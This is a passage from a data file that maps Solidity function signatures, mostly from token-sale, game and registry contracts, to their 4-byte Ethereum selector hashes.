"ORACLIZEGASPRICE()": "0xdbfc74cb", "hardCapMainSale()": "0xf307946d", "acceptManagership()": "0xfd3a77db", "betByte()": "0x5e1e5c88", "bounty_address()": "0x88d0443d", "crowdSaleToken()": "0xac624f52", "slaveWallet()": "0xfeda1045", "advisersPeriodLength()": "0x17031f9c", "defaultAuctionPrice()": "0xf3eac094", "researchDivPercent()": "0x93d7c6bf", "participants()": "0x6c4470fb", "addressB()": "0x4526196e", "publicRate()": "0x7f1f0507", "bonus1Ends()": "0xe8294aad", "totalEther()": "0xae6e22f1", "airdropReserve()": "0x73fba0e8", "THAWING_DURATION()": "0xfdee5c22", "maxgame()": "0xe38c9825", "tokenIdCounter()": "0x98bdf6f5", "disableconstruction()": "0x53ffab1d", "maximumTokenSupply()": "0x12c45f64", "birthBlock()": "0xbba4b31e", "ETHERCOINSupply()": "0x2dd2995a", "coinSupply()": "0x31f170c2", "starbaseCrowdsale()": "0x89ede784", "bountyTokenAmount()": "0x91104f82", "PRE_SALE_PRICE()": "0x193402bb", "privateSaleWallet()": "0xea503429", "teamNamingIncome()": "0xb961b1e0", "admin_wallet()": "0xab6e9072", "CAT_PER_ETH_BASE_RATE()": "0xa12412f0", "getAllForSaleStatus()": "0x216a5543", "EARLY_INVESTOR_WALLET()": "0xd0894297", "PVE_COMPENSATION()": "0xf105e23b", "PriceWeekFour()": "0xed621ae1", "ethToCents()": "0x5d7e8c15", "canonizedRegistry()": "0xdde41aa9", "SECONDS_OF_DAY()": "0x6f35c749", "donationClosed()": "0xac4df041", "teamTimeLock2()": "0xae1d3043", "transferred()": "0x7d85facd", "percentForHelpCoin()": "0xdd3ccd84", "TeamAmount()": "0x1c5fe1a4", "lastBlock_a16Hash_uint256()": "0x92eada50", "getTokenAmount()": "0x75f91ec8", "icoIsRunning()": "0xcb4e7fdc", "neurodao()": "0x89ddeff3", "oneQuarterInSeconds()": "0x61c651b9", "addrTeam()": "0x16876976", "tokensPerCents_gte50kUsd()": "0x7abc06aa", "lastBlock_v14()": "0xc86779a4", "MAX_VOTED_TOKEN_PERC()": "0x962c9c8d", "_useCitizenAsLumberjack(address,uint16,uint16,uint8,uint256)": "0x46503676", "_buildTimberCamp(address,uint256,bytes)": "0x63bf15c2", "_buyTile(address,uint256,bytes)": "0xa28641cc", "setTileType(uint16,bytes32)": "0xc3cb50ed", "EtherCashPay()": "0x15d3cfe2", "createtoken(string,string,string,string,string,string)": "0xa4d91b02", "Xenith()": "0x1652b365", "Ubisoft()": "0xc84920cb", "BcxssToken()": "0x42f91e9e", "iNf4mation()": "0xd629bc12", "RevTokens()": "0xf7903871", "stopTeamTrade()": "0xcc075fa7", "startTeamTrade()": "0x8e752b40", "stopPubTrade()": "0x19a876c2", "startPubTrade()": "0xdc0b48c1", "getTeamList()": "0x1165dce2", "checkTeam(address)": "0x1cd8d8a9", "removeTeam(address)": "0xe546d9c4", "addTeam(address)": "0xb463a75c", "_isTeam()": "0x24cc35a6", "computeCurrentReward(address,address)": "0x510ec598", "getMyTokenBalances()": "0x8bb307a2", "getAccountTokenStats(address)": "0xc399d7c5", "simulatedWithdrawal(address,address)": "0xf8083bab", "simulateWithdrawalAmount(address,address)": "0x4cfe59a7", "depositToken(address)": "0x2fd55265", "YUNXINToken(uint256,string,uint8,string)": "0x9c787ab2", "eastadsCredits()": "0x7c3c0f89", "VivekRohitVibhayToken()": "0xc25b345a", "_mint(address)": "0x09aa7b67", "select_bua_position(uint256)": "0x702c789e", "Zendad()": "0x8df465ea", "WhiteRhino()": "0x50f4556b", "getBattle(string)": "0x16801d17", "registerCoin(string,string,address)": "0x0fa9e486", "splitEth()": "0xa4453ecf", "addZethrAddresses(address,address)": "0xae7a45ba", "exitAll()": "0x5b6c508c", "LeS3coin()": "0x23a2725a", "EmilTestCoin()": "0xae6751e2", "ownedTemplates()": "0x0514be3b", "buyTemplate(uint256)": "0x9d5eb078", "publishTemplate()": "0x94efafe9", "templates()": "0x3a283d7d", "HUToken()": "0xcf07fbb6", "canCollect(uint16,uint16,uint8)": "0x24265000", "collect(uint16,uint16,uint8)": "0xb3dee386", "checkRedemptionFulfilled(bytes32)": "0x00af9811", "markRedemptionFulfilled(bytes32)": "0xd683d1a2", "_markRedemptionFulfilled(bytes32)": "0xdd6e8e6a", "setMaxRedemption(uint256)": "0x99b83f3d", "_redeem(uint256)": "0x28a3dd2c", "backofficeRedeem(uint256)": "0xd26f9cd7", "redeem(uint256,bytes32,bytes)": "0x28ae8ea3", "depositoryDelegate()": "0xa519419e", "setDepositoryDelegate(address)": "0xaf738bbf", "auditorDelegate()": "0xf76d3569", "setAuditorDelegate(address)": "0x2705ce6a", "issuerDelegate()": "0x1b6282e3", "setIssuerDelegate(address)": "0x75806e6e", "claimStakingRewards(address)": "0x96bb1fef", "getCurrentStaked(address)": "0x443de10c", "calculateCritMassRewards(uint256)": "0xe26e7b50", "calculateViralRewards(uint256)": "0x229cfc32", "startStake(uint256,uint256)": "0x128bfcae", "compound(uint256,uint256,uint256)": "0xf3c85eba", "redeemUTXO(uint256,bytes32[],bytes,bool,uint8,bytes32,bytes32,address)": "0x4ecd81b3", "redeemUTXO(uint256,bytes32[],bytes,bool,uint8,bytes32,bytes32)": "0x427da275", "getRedeemAmount(uint256)": "0x2c3ee88c", "canRedeemUTXOHash(bytes32,bytes32[])": "0x7f761472", "canRedeemUTXO(bytes20,uint256,bytes32[])": "0x38ce4d51", "verifyProof(bytes32[],bytes32)": "0xb80ac7df", "pubKeyToBitcoinAddress(bytes,bool)": "0xe073ef69", "pubKeyToEthereumAddress(bytes)": "0x5418796c", "ecdsaVerify(address,bytes,uint8,bytes32,bytes32)": "0xce267b55", "validateSignature(bytes32,uint8,bytes32,bytes32,address)": "0xaf1d06e8", "extract(bytes,uint256)": "0xcfbef67d", "storeWeekUnclaimed()": "0x9283032c", "MartiniumToken()": "0x85e05445", "MyFirstToken()": "0x54afc9a9", "ClothingCoin()": "0xd10e23c8", "DietEthereum()": "0x9aa07ed7", "DeltaChainToken()": "0x6c20ceb4", "KCoinToken()": "0xf574c691", "create(uint8)": "0xc37d9044", "sponsorsOf(uint256)": "0xf8fb1f07", "totalAndRemainOf(uint256,address)": "0x2580ce84", "SmartBusinessToken()": "0x7e6d6928", "BITTECHToken()": "0xc2606d99", "ssstt()": "0xd259224a", "QQBToken(address)": "0x50a675fe", "KBItoken()": "0xe9c771f2", "YUNXIN2Token(uint256,string,uint8,string)": "0xabb9eef4", "j2Timeout()": "0x294914a4", "j1Timeout()": "0xc8391142", "RPS(bytes32,address)": "0xc8695e59", "Spendcoin()": "0x49264032", "freezeTime(uint256,uint256)": "0x4ed250bf", "SeedTestToken()": "0x9fddd5a7", "Jamatoken()": "0x478f0735", "AumentaToken(uint256,address)": "0x2bf4d812", "SpegniCassaAutomatica()": "0x55a5dc3c", "AccendiCassaAutomatica()": "0x485f2ce3", "BilancioMinimoAccount(uint256)": "0x63fcabcb", "RiservaETH(uint256)": "0x89af175c", "feeCMT(uint256)": "0x3c7066d1", "PrezzoCMT(uint256,uint256)": "0xa64fa869", "BloccaConto(address,bool)": "0x2b198808", "AggiungiMiner(address,bool)": "0x9f7d9f92", "zasxzasxqa()": "0xe53229c7", "HARJToken(address,string,uint8,string)": "0x2d358710", "setVipInfo(address,uint256)": "0xc3c8c12b", "SurveyTokenSale()": "0xece7c397", "registerAppVersion(bytes32,bytes32,address,bytes4[],address[])": "0x1f34d1d3", "registerApp(bytes32,address,bytes4[],address[])": "0x965be457", "appVersionListAt(bytes32,uint256)": "0x9f7f0784", "previousVersion(bytes32,bytes32)": "0x40220b03", "versionAddresses(bytes32,bytes32)": "0xdaeb860d", "versionSelectors(bytes32,bytes32)": "0xa8e9b249", "versionIndex(bytes32,bytes32)": "0xaee98408", "versionBase(bytes32,bytes32)": "0x4394cc96", "appVersionList(bytes32)": "0x535bf003", "appBase(bytes32)": "0xd4229b1a", "registeredApps()": "0x5c617279", "RecoverySha3(address,uint256,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x68879e5f", "RecoverySha256(address,uint256,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x44795c13", "KRYPTONIUM()": "0x98416339", "coin()": "0x11df9995", "Ethernext()": "0x001b1441", "VirtueToken()": "0xa115e38f", "MCToken()": "0x04275375", "Send_Data(address,uint16)": "0x770eaebe", "MUC()": "0x8eeb8e5a", "berrycoin()": "0x6d11cf72", "SiekechuCoin()": "0x0118e662", "getMintableAddress()": "0x9646b85d", "FlowchainToken()": "0x98066221", "getSecretRevealBlockHeight(bytes32)": "0xc1f62946", "registerSecret(bytes32)": "0x12ad8bfc", "getTrace(uint256)": "0x8d927069", "getTotalNbOwners(uint256)": "0x763d2500", "getCurrentOwner(uint256)": "0x7ace341b", "receiveObject(uint256,address)": "0x7aece878", "sendObjectWithoutApproval(uint256,address)": "0x8de8d47c", "approveObjectReception(uint256)": "0x42e6c88a", "sendObjectWithApproval(uint256,address)": "0x6bed6de5", "createObject(string)": "0x759f0914", "DIGITALCASH()": "0xf1c61958", "percentFrom(uint256,uint8)": "0xb4ba2a1b", "getDeposits(address)": "0x94f649dd", "setWallets(address,address,address,address)": "0x83672f3e", "TimeLockedWallet(address,address,uint256)": "0x7bdc297c", "SHAToken(uint256,string,string)": "0xd68f65f8", "calcCollectedFee(uint256)": "0xaa98d57b", "valueAfterReducingFee(uint256)": "0x6f3d8043", "fromWeiToFp(uint256)": "0x1f05ff29", "fromTweiToFp(uint256)": "0x95818603", "sellRateZeroQuantity(uint256)": "0x625cfc46", "sellRate(uint256,uint256,uint256)": "0x925176d6", "buyRateZeroQuantity(uint256)": "0xdebc74f6", "buyRate(uint256,uint256)": "0x5909e897", "rateAfterValidation(uint256,bool)": "0xa2c99d47", "resetCollectedFees()": "0xb86f6aa7", "setLiquidityParams(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x4857d52d", "deltaEFunc(uint256,uint256,uint256,uint256,uint256,uint256)": "0xa0099b60", "deltaTFunc(uint256,uint256,uint256,uint256,uint256)": "0x82f19e3a", "pE(uint256,uint256,uint256,uint256)": "0x20b0961c", "ln(uint256,uint256,uint256)": "0x275acbe3", "logBase2(uint256,uint256,uint256)": "0xa0dbde9d", "log2ForSmallNumber(uint256,uint256)": "0x8369ff08", "countLeadingZeros(uint256,uint256)": "0x869d7d93", "compactFraction(uint256,uint256,uint256)": "0x8401824f", "DEFToken()": "0x33cfc5e3", "insert(string,string)": "0x06e63ff8", "MyFiChain()": "0x2ec9c537", "hashToken()": "0xb8b7edb2", "BagPackToken()": "0x89bc2006", "getMyPastLosses(address)": "0xa7dea7e4", "getMyPastWins(address)": "0xa62875d9", "updateExistingRaz(uint256,uint256,uint256,uint256,uint256,string)": "0x61f3cfb1", "addNewRaz(uint256,uint256,uint256,uint256,string)": "0x3ca1595a", "resetRaz(uint256,address,uint256)": "0xc77ae9bf", "frwd()": "0x60d3b4b0", "endPublicIcoForTesing()": "0xe914575b", "allocateForPrivateSale(uint256)": "0xd426bb47", "burnRemaining(address)": "0xc87235fd", "endPublicIco()": "0x078e096d", "setTiimKyberGoAddress(address)": "0x84109e50", "startPublicIco(address)": "0x648d9e26", "setTiimPrivateSaleAddress(address)": "0x822a46ae", "createTokenTimelock(address,uint256)": "0x3c4a4b1e", "GXX()": "0x7a039beb", "getRate(string,uint64)": "0x42bf8db3", "setSigningPublicKey(string)": "0x874b4fcc", "setEncryptionPublicKey(string)": "0x5940f55c", "removeEndorsement(bytes32,bytes32)": "0x3f65d97f", "checkEndorsementExists(bytes32,bytes32)": "0xe7062263", "acceptEndorsement(bytes32,bytes32)": "0x401611ed", "addEndorsement(bytes32,bytes32)": "0xf3945ca0", "removeAttribute(bytes32)": "0xe7996f07", "split(uint256)": "0xdbceb005", "combine(uint256[],uint256)": "0x234c0ae5", "addContract(bytes32,address,bytes32)": "0xfe3c458e", "bootstrap()": "0xfb969b0a", "Cmc()": "0xa6c662ea", "getProfileHash(address,address)": "0x8005993e", "setProfileHash(string)": "0x65d8e32e", "localsUser()": "0x4212616b", "TokenIceBox(address)": "0x5f399d28", "searchReport(string)": "0x6840721d", "getReport(uint256)": "0x4e7f9b19", "getReportCount()": "0xcad9642b", "createReport(string,string,string,string,uint8)": "0x3ccaf593", "newBadAPM(bytes32,bytes32,address,bool)": "0xbfc5624a", "test_8_accessRestriction_UnderscoreAddMember_shouldThrow()": "0xb0ec2bed", "test_7_accessRestriction_UnderscoreRemoveMember_shouldThrow()": "0x354271b4", "test_6_accessRestriction_removeMember_shouldThrow()": "0x81e7e329", "test_5_accessRestriction_addMember_shouldThrow()": "0xc48b1cf0", "test_4_accessRestriction_execute_shouldThrow()": "0x2f92acc5", "test_3_accessRestriction_vote_shouldThrow()": "0x36cb8740", "test_2_accessRestriction_newProposal_shouldThrow()": "0x555db767", "test_1_restrictDoubleVote_shouldThrow()": "0x4b9e7ecd", "test_0_testBasicTxProposal()": "0xfa6ac98e", "_removeMember(address)": "0xfbc990d0", "_addMember(address)": "0x1d40bbcf", "SigUser(address)": "0xe3e88734", "set()": "0xb8e010de", "get_time()": "0x966a1961", "getRole(string)": "0x6e9067fb", "setRole(string,string)": "0xd0799bee", "isAuthorized(address,bytes4)": "0xd9972b96", "UpgradedNodelist()": "0x50a6887c", "Example4(string)": "0xc1e59a50", "permittedSender()": "0xf28ee00c", "Escrow(address)": "0x22284872", "createGenesisUniverse()": "0x9684da1a", "time()": "0x16ada547", "mint(int256,address,uint256,bytes)": "0x392c00a2", "MigrateController(address)": "0x442efdc1", "getIreg()": "0x92b3228c", "getReg3()": "0x8c82790b", "getReg2()": "0x87ccb440", "getReg1()": "0x2e8511f0", "getCallPtr()": "0xfc0c50fe", "getStackPtr()": "0xc5aad3be", "getMemsize()": "0xdae79483", "getPC()": "0xe781d8c5", "setCallType(uint256,uint256)": "0xbee40aa4", "setCallTable(uint256,uint256)": "0x682bea5c", "setGlobal(uint256,uint256)": "0x10c74fc6", "setStack(uint256,uint256)": "0x4e2743b3", "setMemory(uint256,uint256)": "0x18e3b44c", "setCallStack(uint256,uint256)": "0xc8a2c880", "createInputData(uint256,uint256)": "0x86820a7d", "getInputData(uint256,uint256)": "0xa50b21c8", "setInputData(uint256,uint256,uint256)": "0x44b9efb2", "setNthByte(uint256,uint256,uint8)": "0x5a470aff", "setInputFile(uint256,bytes32)": "0x5f645f16", "setInputSize(uint256,uint256)": "0xb6c279ee", "setInputName(uint256,uint256,uint256)": "0x8c4406c1", "getInputName(uint256,uint256)": "0xe9a76ff7", "getInputSize(uint256)": "0xdd1b1928", "getGlobal(uint256)": "0x3c490a70", "getMemory(uint256)": "0x2257406e", "getCallTypes(uint256)": "0x90d68bb6", "getCallTable(uint256)": "0x09fc1ae0", "getCallStack(uint256)": "0xe7f23cb1", "getStack(uint256)": "0x62531721", "getRoot2_16(uint256)": "0xe436a3f7", "getRoot2(uint256)": "0x045f2593", "setLeaf2(uint256,uint256)": "0xd9ce2451", "getLeaf2(uint256)": "0x4dd19434", "getRoot(uint256)": "0x9b24b3b0", "setLeaf(uint256,uint256)": "0xe3f508f5", "hashMachine()": "0x5a54e755", "setMachine(bytes32,bytes32,uint256,uint256,uint256,uint256)": "0x27f3fb69", "hashVM()": "0x853e88fe", "setVM(bytes32[10],uint256[4])": "0xa84ebb58", "FlatPricing(uint256)": "0xdcc5237b", "assertItDoesntThrow(string)": "0x76c6c685", "assertThrows(string)": "0x84a9d711", "setDistanceAndPrice(uint16,uint16)": "0x622a2d31", "FareBase(uint16,uint16)": "0x705f911d", "getMfgDetails(string)": "0x63727449", "getDistValues(string)": "0x6c463635", "fetchInitialDetails(string)": "0x87d517c9", "getReport(string,uint256)": "0x02f20b9c", "setReport(string,uint256,string)": "0x365ede48", "setMfgValues(string,string,string,string,string,string)": "0x7972d079", "setDistValues(string,string,string,string,string)": "0xbaaa3eef", "createOrder(string,string,string,string,string,string)": "0x826f8a00", "test_shutDownVersion()": "0xf4d92886", "test_addAndGetVersion()": "0xe4aa82d7", "triggerEvent(int256)": "0x3840369b", "returnsTwoUnnamed(uint256,uint256)": "0x28985c17", "returnsTwoNamed(uint256,uint256)": "0xc43a6a79", "returnsOneUnnamed(uint256,uint256)": "0xed1a9ca1", "returnsOneNamed(uint256,uint256)": "0x86231246", "TestContract(int256,string)": "0xd635357e", "transferToThroughVariable(address,uint256)": "0x2b860e6d", "finalTokensIssueTime()": "0xada1b74e", "lastBlock_v15Hash_uint256()": "0x666923ea", "jackpotLastQualified()": "0x109050bc", "beneficiaryMultisig()": "0x3150efbd", "lockup_enddate()": "0x3d565121", "CoreAddress()": "0xffc0483d", "gameRandon1()": "0x2284b051", "capitalRaised()": "0xf681f6e7", "getNumberThree()": "0x7aa9a7f9", "microRate()": "0xa404f291", "_tokenPrice()": "0x3b971f9f", "paymentSizeB()": "0xdea5408f", "allowAvatarCreation()": "0x186d9ce8", "numImages()": "0x28d936fe", "crowdSaleDragonPrice()": "0xae262114", "buildTokenContract()": "0xa0d0ee3b", "founderMultiSigAddress()": "0x2edefc26", "YOU_BET_MINE_DOCUMENT_PATH()": "0xb794004d", "sweeper()": "0x9189a59e", "BOUNTY_PERCENT()": "0x537038c3", "rate0()": "0x93c19e18", "tokensDuringPhaseOne()": "0x49b8f5d9", "firstAuctionsExtendableDuration()": "0xbd131a78", "RESERVED_BOUNTY_SIDE()": "0xd195fd28", "sURL()": "0x452e0d25", "goodNightSweetPrince()": "0xed2d1d9e", "maxBonusTickets()": "0x3e152d8e", "addressBilborough()": "0xb96e988b", "incomingTokensTransactions()": "0x80d7bcba", "tokenIssued()": "0x51a11e94", "showToken_For_Circulation()": "0xa6b10dd1", "RATE_SALESTAGE7()": "0xa3316ccc", "whaleAddress()": "0xdd1ee3d7", "revealedCeilings()": "0x6064d863", "ROUND_TIME()": "0x7892fd29", "lockBalance()": "0xe228ecb4", "white_duration()": "0x14c259eb", "supportAccount()": "0xe3637435", "marketsubscribers()": "0x44d1a074", "stakeWaived_Eth()": "0x2d2fe9d4", "crowdsaleTargetReached()": "0xacce4b10", "squirrelmasterReq()": "0xd8145062", "timeWithoutUpdate()": "0xd9f81b83", "tierTotal()": "0x79420fb1", "destinationAddress80()": "0x9b1a9b23", "SPIDER_BOOST()": "0x73bc8b77", "TIER2()": "0x40058f61", "foundationTokenWallet()": "0x903171ae", "_totalFee()": "0x283f7820", "ETHmultiplier()": "0xc042575f", "preSaleFund()": "0x4f2b0e41", "extractInvoicedLength()": "0x54d4da57", "candyBalance()": "0xa61fe970", "investedBTC()": "0x470b1984", "sellEther()": "0xced4f4b8", "_capOwO()": "0x17d18cd6", "distributorAddress()": "0xa51af4c5", "leafPrice()": "0xe203f335", "totalPhases()": "0x3c5d1812", "tryFinalizeStage()": "0xa73598fd", "lockedFundsForthefuture()": "0xa245b774", "clientVersion()": "0x044c1d4d", "credosReserveAllocation()": "0x48794149", "excessTokensBurnt()": "0xa197ec5d", "LimitTop()": "0xd98bf529", "tokensAllocated()": "0x755e3e28", "DOW_SUN()": "0x29441674", "getReferrerBonusTokens()": "0xbb7c62cb", "applyWait()": "0xf2eaee02", "totalLockedTokens()": "0xf5c476f9", "_FIVETHOUSAND()": "0x16339604", "isMiningOpen()": "0x7f99e11a", "ReserveSupply()": "0xa4a6795a", "stepLockCheck()": "0x6bf51a18", "withdrawCrowdsaleDragons()": "0xa196981b", "tier3Time()": "0xb5a9823f", "gasInTokens()": "0x33a87ade", "wolkFund()": "0xc3521b1a", "MAINT_PRICE()": "0x64109ae0", "tankImposedMax()": "0xf9b71e73", "RATE_SALESTAGE1()": "0xd0b4755c", "gameStartBlock()": "0x3804c73d", "Round()": "0x916df92a", "setMintDone()": "0xb5e82975", "buyerBonus()": "0x221086af", "lastPriceSetDate()": "0x31719c69", "eta()": "0xf7992d85", "wishes()": "0x37f50f57", "ICO_LEVEL_2()": "0xe08d8497", "SCComplianceService()": "0x9e4a9f2f", "tokensFor1EthP1()": "0xcb6c1655", "getLifeCoin()": "0x9b5906e5", "tierTwoPurchase()": "0x6059838b", "organization()": "0x23bd4d7a", "remainingTokenHolder()": "0x4129b8ed", "periodPercent()": "0x9f963c4e", "PERIOD()": "0xb4d1d795", "icoOver2()": "0xd723879c", "ADVISERS_AND_FRIENDS_WALLET()": "0x5ed49e9b", "mainSaleFirstBonus()": "0x708238a0", "startSlotAt()": "0x19e77c34", "totalCheque()": "0xb0f239e9", "roundOpen()": "0x2032677f", "paymentPeriods()": "0x6c981488", "cr()": "0x62eb33e3", "addressC()": "0xc79fc609", "professionalName()": "0x237a35b2", "earlyBackerSupplyRemaining()": "0xf8adb686", "isLimitMint()": "0x36a33f99", "icoLeftSupply()": "0x52e536ad", "privateEquityClaimed()": "0x0b39aaa9", "minTokensToSale()": "0x63018e1a", "minimum()": "0x52d6804d", "ULTRA_HERO_MULTIPLIER()": "0x964a4ac7", "refresherFee()": "0xb07741fd", "MARKET_SHARE()": "0xcb985dd1", "addDividend()": "0x8cac3b42", "FIVE_YEAR_KEEPING()": "0xd48fb85c", "NumberOfAuctions()": "0xb92edfc6", "ICODays()": "0xe01b1b10", "numOperators()": "0xbd820688", "LEGAL_EXPENSES_1_TOKENS()": "0xaccfaeba", "CROWDSALE_MAX_ACES()": "0x5ab5d07d", "closeIcoOne()": "0xc2d25167", "amountOfRegisters()": "0xd01d6b86", "RELEASE_PERIODS()": "0x00ad3a23", "upgradeAgentStatus()": "0x18d0122a", "_CAP()": "0x08d50eb3", "piStartTime()": "0xb5ae64b2", "getCategoryId()": "0x817b90fe", "airdroper()": "0x157db359", "relay()": "0xb59589d1", "vaultAddress()": "0x430bf08a", "isInSale()": "0x42753e7e", "dayPotHighscore()": "0x62797ef5", "product3_pot()": "0xc2e55da3", "reserveTimelock()": "0xb4f3b453", "m_owner80()": "0x04293236", "totalTransactions()": "0xb9a60038", "getBatchCreateDrawingsAddress()": "0x78581a46", "decimls()": "0x748b95b6", "walletB()": "0x15f28c5f", "participantCapTier1()": "0xd458c522", "getPayoutRequestedState()": "0x95a3bf6e", "powerStatus()": "0xdf9204b6", "PRE_SALE_PERCENT()": "0x1440f2bf", "adminRescueFunds()": "0x9ecbf341", "bidETHIncrement()": "0xe340c2fb", "requestBurnerContract()": "0xe40e8457", "legendsCrowdfund()": "0x642231a6", "MAX_CROWD_FUNDING_ETH()": "0xc7614487", "PUBLIC_CROWDSALE_SOFT_CAP()": "0xe4274453", "presaleSupply()": "0xb3a196e9", "largestPenisOwner()": "0x688263d7", "contract_md5()": "0xcfd4ca6b", "totalTokenSale()": "0x24645c5a", "communityPeriodsNumber()": "0xd98b094c", "PROMETHEUS_VOUCHER_LIMIT()": "0xb7f927e6", "referalBonusPercent()": "0x8dbdfae7", "factorWeight()": "0x2a816e65", "gen0CreationLimit()": "0x404d0e3e", "feesData()": "0xb682da3e", "FUNDING_ETH_HARD_CAP()": "0xe072830c", "TOKEN_INVESTORS()": "0xb3922c42", "minprice()": "0x28b2e781", "distributeInitialFunds()": "0x2c5a736f", "LOCK_MAX()": "0x3d8731ac", "playAway()": "0xd0e2dc64", "featurePrice()": "0xf63841e4", "initBlockEpoch()": "0x369f927f", "allCatsAssigned()": "0x9e3e6878", "poolState()": "0x641ad8a9", "affiliatesAllocation()": "0x7018e950", "defaultTreesPower()": "0x388a1526", "SaleStop()": "0xa510921e", "gameMiningTokenStartTime()": "0x862b525c", "percentToPresalersFromICO()": "0x443af072", "minimalSuccessUSDWEI()": "0x13de214e", "tier2Start()": "0x65baf5db", "RATE_TIER3()": "0x4f961a6b", "firstTimer()": "0x978cb570", "lockAtTime()": "0xbead21a6", "HARD_CAP_IN_TOKENS()": "0x42d02b30", "exchangeFinished()": "0xa664225c", "donate_step()": "0xf5fb9137", "blok()": "0x3097f94c", "month24companyUnlock()": "0xa557f834", "LOCK_TOKENS_DURATION()": "0x4988ef98", "getEGTTotalSupply()": "0x11340c21", "freeCount()": "0xa6f48c90", "totalPicoUSD()": "0x02bfeeb8", "heroCore()": "0xe7bbda11", "totalAmountOfTokens()": "0xa9510f89", "ALLOC_SALE_GENERAL_3()": "0x6d584266", "clearDelegateAndUnlockTokens()": "0x645bd436", "COMPANY_ACCOUNT()": "0xb159bcff", "nextWithdrawDayTeam()": "0x5a237491", "WITHDRAWAL_END()": "0x9a701075", "privateSaleClosingTime()": "0x9aef0c6c", "MAIN_COIN_PER_ETHER_ICO()": "0x477492dc", "level_2_amount()": "0x589316f6", "optionsConverter()": "0xd2e3646c", "standardrate()": "0x9bc13360", "startPreICOStage1()": "0xd7777c29", "weiPerCHF()": "0xa23bfd84", "lockedTeam()": "0x5107fde8", "drawNum_()": "0x44b20e7a", "DEFAULT_REVOCABLE()": "0x7f5369f1", "bonusSupply()": "0x863843bc", "baseUnit()": "0xc2930f91", "debugLatestPurchaseCentsValue()": "0xa1907386", "AirdropClaim()": "0x67194bee", "partner1_voted_update_marriage_status()": "0x1ea5efc4", "isStbMintedForStaEx()": "0x55afb12d", "ctrtMarketPrice()": "0x03ade532", "vestFromTime()": "0xde1079b3", "isInGame()": "0x5b050e77", "numCities()": "0x24b5c134", "ICDSupply()": "0x9d2ff29c", "minCashout()": "0x45408a8a", "fee_claimer()": "0xf7c360e0", "raisedAmount()": "0xc59ee1dc", "phasePublicSale1_From()": "0x11223a2f", "administrationContractFrozen()": "0x78ed43c1", "lastNewInterest()": "0x8e550bd1", "migrationHost()": "0xa4a8f8ea", "currentSalePriceInWei()": "0xeb570b05", "artistName()": "0x5b2f515b", "kyberNetworkContract()": "0x4f61ff8b", "currentHitTotal()": "0x169e18d9", "OEM_Wallet()": "0x79ae77cf", "isCapped()": "0x671528d4", "firstPeriodSupply()": "0xe0bede59", "tokenAdvisorsAllocated()": "0x4e5c0595", "teamStageSetting()": "0x852f31c6", "subDevOne()": "0x88301f57", "image()": "0xf3ccaac0", "numTokensTotal()": "0xaf129dc2", "firstCurrentAmount()": "0x8b2be40e", "securityCheckURI()": "0xfdc37c85", "casinoDeposit()": "0x7a0d819e", "absoluteEndBlock()": "0x1f4e01d9", "blocksquare()": "0x861c3385", "WEI_TO_COGS()": "0x676d1d9c", "cancelFee()": "0x14025dcd", "platformLogin()": "0x808e0ae2", "OPTIONAL_POOL()": "0x65db6c8c", "getExpectedTotalTokens()": "0x895c1596", "transactionsOn()": "0x5120bb20", "weiCostOfToken()": "0x48e021e9", "gupSold()": "0x6dbd6689", "HIGH()": "0xb73974a1", "whiteListContract()": "0x5ed5ea28", "dragonsStatsContract()": "0x6a2ddfce", "TOKEN_CREATION_CAP()": "0xf9fae4f7", "proposalInProgress()": "0x4f1eb4b2", "VOLUME_70()": "0x4e5d8edd", "allRevealed()": "0x4b28bdc2", "END_TIME()": "0x37ba682d", "TyzonSupply()": "0x89864915", "distributeMarketingShares()": "0x55107916", "getRTEBonusTokenVaultBalance()": "0xde301e8c", "MAX_STAGE_2_LIMIT()": "0x8206ba89", "votesSupport()": "0x07b8ef24", "PROVISIONING_supply()": "0xb6cf3579", "mediumRate()": "0xed1923ee", "founderWithdrawablePhase2()": "0x7708b441", "BONUS_CAP()": "0xcd4d4b46", "tokenSaleClosed()": "0xe55a07c2", "DGPTokenOldContract()": "0xd7a5fdee", "firstWithdrawAmount()": "0x26b52faf", "currentTokenAmount()": "0xff69ac36", "thirdExchangeRatePeriod()": "0x63c37984", "xcc()": "0xd84bd737", "currAdminEpoch()": "0x3c205b05", "USDValue()": "0x6f227851", "mainSaleRateP1()": "0xf980a012", "month60Unlock()": "0xae5c888d", "MeetingTimeSetFailure()": "0x5dfd1bff", "ratePerEth()": "0x252348dc", "cartaxiToken()": "0x9617d90d", "USD_PER_TOKEN()": "0xba151ad9", "numberOfCampaigns()": "0x07ca140d", "TEMWallet()": "0x759bca86", "ICO_TILL()": "0x4240a978", "vaultPercentage()": "0x263d5ad0", "artsCreatedCount()": "0xed666e96", "hashSecret()": "0xf1ef9881", "maxEtherInvestment()": "0x4df17cdc", "dropAmount()": "0x05748be2", "MIN_AMOUNT()": "0xddbcb5fa", "holdAddress5()": "0xa02c4b97", "FACTOR_4()": "0x8ba9a7bb", "phase_5_bonus()": "0xf5323da4", "fabricTokenSafe()": "0xf4fa8603", "multisigOwner()": "0xd1571996", "initialTotalSupply()": "0x311028af", "totalPartnerSupply()": "0x1b0a5d4e", "advisorsSupply()": "0xcbe29f34", "wedaddress()": "0x4f0e3333", "minETH()": "0xdf67d82d", "maxTxValue()": "0xe8eecf4c", "sharesTokenAddress()": "0x27ebcf0e", "nftContract()": "0xd56d229d", "singularDTVFund()": "0x58a74333", "initTime()": "0x04115187", "advisersReserve()": "0x0a8f8fb9", "FundingManagerEntity()": "0x6ad49245", "ethartArtAwarded()": "0x4acefeb1", "superOwner()": "0x87dcd2b6", "firstChipBonus()": "0xfbc6c0f0", "moneyback()": "0xb32fab4e", "totalUsdRaised()": "0x2cea9442", "display_rate()": "0x258072e5", "indexTracker()": "0x87bb675c", "maxtokens()": "0xf7a0ee1c", "getAllowedRangeOfChoices()": "0x5142bc1e", "AIRDROP_TRANSIT_ADDRESS()": "0x998ac104", "dealer_cut()": "0x625fcce7", "addressPreSale()": "0x415510df", "buyAAC()": "0xd270cbaf", "airdropTotalQty()": "0xba4e1c38", "Wallet7()": "0x1a5ab391", "ownerBurnOccurred()": "0x44540e57", "minerTotalTime()": "0xaf0b4cc0", "midTimeBonusLimit()": "0x34302d82", "currentPublicSale()": "0xa323bdb4", "gameGeneration()": "0xeb34967a", "feeModifiers()": "0x617a0951", "PAGE_SIZE()": "0x31b28664", "isRestricted()": "0x1f5e8f4c", "ETOKEN2()": "0x66a23c01", "foundationTarget()": "0x72cd7b89", 